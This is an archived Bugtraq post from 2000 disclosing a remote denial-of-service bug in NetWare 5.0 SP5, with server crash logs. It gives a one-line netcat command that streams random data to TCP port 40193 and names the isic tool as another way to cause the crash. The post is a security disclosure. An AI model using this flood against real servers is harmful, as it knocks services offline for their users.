[15753] in bugtraq

home help back first fref pref prev next nref lref last post

Remote Denial Of Service -- NetWare 5.0 with SP 5

daemon@ATHENA.MIT.EDU (Dimuthu Parussalla)
Wed Jul 12 15:12:56 2000

MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding:  7bit
Message-ID:  <000501bfeab5$9330c3d0$d801a8c0@dimuthu.baysidegrp.com.au>
Date:         Tue, 11 Jul 2000 07:26:56 +1000
Reply-To: dparussalla@baysidegrp.com.au
From: Dimuthu Parussalla <dparussalla@baysidegrp.com.au>
To: BUGTRAQ@SECURITYFOCUS.COM

Remote Denial Of Service -- NetWare 5.0 with SP 5
--------------------------------------------------------------


I encounter a buffer overflow bug in NetWare 5.0 with service pack 5. After
few minutes after the attack server issue a memory allocation error.


10-07-2000  12:29:53 pm:    SERVER-5.0-4631  [nmID=1001C]
     WARNING! Server XXXXX experienced a critical error.  The offending
process was suspended or  recovered.
     However, services  hosted by this server may have been affected.


I continued the attack another 1/h hr or so. then server issued a Abend
error and hangs.




10-07-2000  12:29:53 pm:    SERVER-5.0-4631  [nmID=1001C]
     WARNING! Server XXXXX experienced a critical error.  The offending
process was
     suspended or recovered.  However, services hosted by this server may
have been affected.



ATTACK INFO
-----------------

Using a linux server connected to the same network. I did the following


[root@tik /root]# cat /dev/urandom |nc 192.168.1.15 40193


NetWare TCP port 40193 doesn't handle frag TCP packets as well. using isic I
got the same results



FIX
-----


No FIX yet

home help back first fref pref prev next nref lref last post